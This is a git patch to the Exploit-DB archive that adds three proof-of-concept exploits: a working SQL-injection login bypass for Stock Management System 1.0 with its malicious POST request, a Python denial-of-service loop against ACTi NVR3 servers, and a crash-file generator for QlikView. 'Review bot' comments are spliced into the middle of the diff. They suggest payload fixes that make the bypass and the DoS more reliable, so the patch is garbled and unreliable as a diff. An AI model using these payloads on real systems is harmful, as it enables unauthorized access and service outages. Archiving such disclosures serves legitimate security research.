From b4336a29355364a4cf1e4cc48be8974d8863e544 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 6 Aug 2020 05:01:49 +0000
Subject: [PATCH] DB: 2020-08-06

3 changes to exploits/shellcodes

ACTi NVR3 Standard or Professional Server 3.0.12.42 - Denial of Service (PoC)
QlikView 12.50.20000.0 - 'FTP Server Address' Denial of Service (PoC)
Stock Management System 1.0 - Authentication Bypass
---
 exploits/php/webapps/48733.txt | 71 ++++++++++++++++++++++++++++++++++
 exploits/windows/dos/48731.py | 41 ++++++++++++++++++++
 exploits/windows/dos/48732.py | 24 ++++++++++++
 files_exploits.csv | 3 ++
 4 files changed, 139 insertions(+)
 create mode 100644 exploits/php/webapps/48733.txt
 create mode 100755 exploits/windows/dos/48731.py
 create mode 100755 exploits/windows/dos/48732.py

diff --git a/exploits/php/webapps/48733.txt b/exploits/php/webapps/48733.txt
new file mode 100644
index 000000000..b0e17a5b9
--- /dev/null
+++ b/exploits/php/webapps/48733.txt
@@ -0,0 +1,71 @@
+# Exploit Title: Stock Management System 1.0 - Authentication Bypass
+# Exploit Author: Adeeb Shah (@hyd3sec)
+# Date: August 1, 2020
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html
+# Version: 1.0
+# Tested On: Windows 10 (x64_86) + XAMPP 7.4.4
+
+# Vulnerable Source Code
+
+
+if($_POST) {
+
+ $username = $_POST['username'];
+ $password = $_POST['password'];
+
+ if(empty($username) || empty($password)) {
+ if($username == "") {
+ $errors[] = "Username is required";
+ }
+
+ if($password == "") {
+ $errors[] = "Password is required";
+ }
+ } else {
+ $sql = "SELECT * FROM users WHERE username = '$username'";
+ $result = $connect->query($sql);
+
+ if($result->num_rows == 1) {
+ $password = md5($password);
+ // exists
+ $mainSql = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";
+ $mainResult = $connect->query($mainSql);
+
+ if($mainResult->num_rows == 1) {
+ $value = $mainResult->fetch_assoc();
+ $user_id = $value['user_id'];
+
+ // set session
+ $_SESSION['userId'] = $user_id;
+
+ header('location: http://localhost/stock/dashboard.php');
+ } else{
+
+ $errors[] = "Incorrect username/password combination";
+ } // /else
+ } else {
+ $errors[] = "Username doesnot exists";
+ } // /else
+ } // /else not empty username // password
+
+} // /if $_POST
+?>
+
+
+# Malicious POST Request to https://TARGET/stock/index.php HTTP/1.1
+POST /stock/index.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.222.132/stock/
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 47
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=j3j54s5keclr8ol2ou4f9b518s
+Upgrade-Insecure-Requests: 1
+
+email='+or+1%3d1+--+admin&password=badPass
\ No newline at end of file
diff --git a/exploits/windows/dos/48731.py b/exploits/windows/dos/48731.py
new file mode 100755
index 000000000..bb1480ffc
--- /dev/null
+++ b/exploits/windows/dos/48731.py
@@ -0,0 +1,41 @@
+# Exploit Title: ACTi NVR3 Standard or Professional Server 3.0.12.42 - Denial of Service (PoC) #
+# Date: 2020-08-04 #
+# Exploit Author: MegaMagnus #
+# Vendor Homepage: https://www.acti.com/ #
+# Software Link: https://www.acti.com/DownloadCenter #
+# Version: V.3.0.12.42 , V.2.3.04.07 #
+# Tested on: Windows 7, Windows 10 #
+# CVE: CVE-2020-15956 #
+# This is a Proof of Concept Exploit, Please use responsibly. #
+#################################################################################
+
+#!/usr/bin/env python
+import requests
+from requests.auth import HTTPBasicAuth
+import sys
+
+def product_info(server):
+ try:
+ r = requests.get(sys.argv[1] + '/media/Product/getProductInfo', timeout=10)
+ if r.status_code == 200:
+ print(r.text)
+ return True
+ except Exception as e:
+ print(e)
+ return False
+
+if __name__ == "__main__":
+ if len(sys.argv) != 2:
+ print("usage: cve-2020-15956.py ")
+ exit(-1)
+ if product_info(sys.argv[1]):
+ print("Starting DOS. Use Ctrl-C (SIGINT) to stop!")
+ while True:
+ try:
+ payload = b"\x00" * (760)
+ r = requests.get(sys.argv[1] + '/Media/UserGroup/login', auth=HTTPBasicAuth('Basic',payload), timeout=10)
+ print(r.status_code)
+ except KeyboardInterrupt:
+ pass
+ except Exception as e:
+ pass
\ No newline at end of file
diff --git a/exploits/windows/dos/48732.py b/exploits/windows/dos/48732.py
new file mode 100755
index 000000000..407710df2
--- /dev/null
+++ b/exploits/windows/dos/48732.py
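Review bot: The request body sends `email=` while the quoted login handler reads `$_POST['username']`, so as written the PoC lands in the `Username is required` branch and never reaches the injectable query; the body should be `username='+or+1%3d1+--+admin&password=badPass`, and `Content-Length` recomputed to match (the shown 42-byte body does not match the declared 47 either, unless something was lost in rendering). The bypass also hinges on `$result->num_rows == 1` and `$mainResult->num_rows == 1`, and `' or 1=1 -- ` returns every row, so it only succeeds when the `users` table holds exactly one account; `' or 1=1 limit 1 -- ` or a known account such as `admin' -- ` is the reliable form. The advisory gives no remediation: it should state that both `$connect->query()` calls need prepared statements with bound parameters, and that `md5($password)` should be replaced with `password_hash()`/`password_verify()`, since a fast unsalted hash is a second finding in its own right.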
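Review bot: Inside the `while True` loop, `except KeyboardInterrupt: pass` swallows the signal, so the `Use Ctrl-C (SIGINT) to stop!` message is wrong and the operator has no clean way to stop the DoS; change it to `except KeyboardInterrupt: break`. The trailing `except Exception as e: pass` also hides the only evidence that the target has gone down (timeout or connection refused), which is the whole output of a DoS PoC — at least `print(e)` there, or narrow it to `requests.RequestException`. `product_info(server)` ignores its `server` argument and re-reads `sys.argv[1]` for the URL; use `server` so the helper is reusable. The `#!/usr/bin/env python` line sits below the header comment, so it is not an effective shebang despite the file's 100755 mode.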
@@ -0,0 +1,24 @@
+# Exploit Title: QlikView 12.50.20000.0 - 'FTP Server Address' Denial of Service (PoC)
+# Discovery by: Luis Martinez
+# Discovery Date: 2020-08-03
+# Vendor Homepage: https://www.qlik.com
+# Software Link: https://www.qlik.com/us/trial/qlik-sense-business
+# Tested Version: 12.50.20000.0
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to Produce the Crash:
+# 1.- Run python code: QlikView_12.50.20000.0.py
+# 2.- Open QlikView_12.50.20000.0.txt and copy content to clipboard
+# 3.- Open "QlikView 12"
+# 4.- File -> "Open FTP ..."
+# 5.- Paste ClipBoard on "FTP Server Address"
+# 6.- Connect
+# 7.- Crashed
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 300
+f = open ("QlikView_12.50.20000.0.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 50f6684a9..1c63aa170 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
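Review bot: The `f = open(...)` / `f.write(buffer)` / `f.close()` sequence leaves the handle open if the write raises; the idiomatic form is `with open("QlikView_12.50.20000.0.txt", "w") as f: f.write(buffer)`. The `#!/usr/bin/env python` line is placed after the header comments, so it has no effect as a shebang despite the 100755 mode. The `Software Link` points at a Qlik Sense Business trial while the advisory targets QlikView 12, which looks like a copy-paste slip; it should point at the QlikView download or say where the tested build came from. Step 7 only says `Crashed` — a DoS PoC is far more useful with the faulting module and exception (access-violation address, and whether any of the 300 `\x41` bytes reaches a controllable register or SEH record), so readers can judge whether this is more than a crash.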
@@ -6757,6 +6757,8 @@ id,file,description,date,author,type,platform,port
 48697,exploits/windows/dos/48697.py,"Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)",2020-07-26,"Felipe Winsnes",dos,windows,
 48728,exploits/windows/dos/48728.py,"Mocha Telnet Lite for iOS 4.2 - 'User' Denial of Service (PoC)",2020-08-04,"Luis Martínez",dos,windows,
 48729,exploits/windows/dos/48729.py,"RTSP for iOS 1.0 - 'IP Address' Denial of Service (PoC)",2020-08-04,"Luis Martínez",dos,windows,
+48731,exploits/windows/dos/48731.py,"ACTi NVR3 Standard or Professional Server 3.0.12.42 - Denial of Service (PoC)",2020-08-05,MegaMagnus,dos,windows,
+48732,exploits/windows/dos/48732.py,"QlikView 12.50.20000.0 - 'FTP Server Address' Denial of Service (PoC)",2020-08-05,"Luis Martínez",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -42972,3 +42974,4 @@ id,file,description,date,author,type,platform,port
 48725,exploits/php/webapps/48725.txt,"Online Shopping Alphaware 1.0 - Authentication Bypass",2020-07-30,"Ahmed Abbas",webapps,php,
 48727,exploits/python/webapps/48727.py,"Pi-hole 4.3.2 - Remote Code Execution (Authenticated)",2020-08-04,"Luis Vacacas",webapps,python,
 48730,exploits/php/webapps/48730.py,"Daily Expenses Management System 1.0 - 'username' SQL Injection",2020-08-04,"Daniel Ortiz",webapps,php,
+48733,exploits/php/webapps/48733.txt,"Stock Management System 1.0 - Authentication Bypass",2020-08-05,"Adeeb Shah",webapps,php,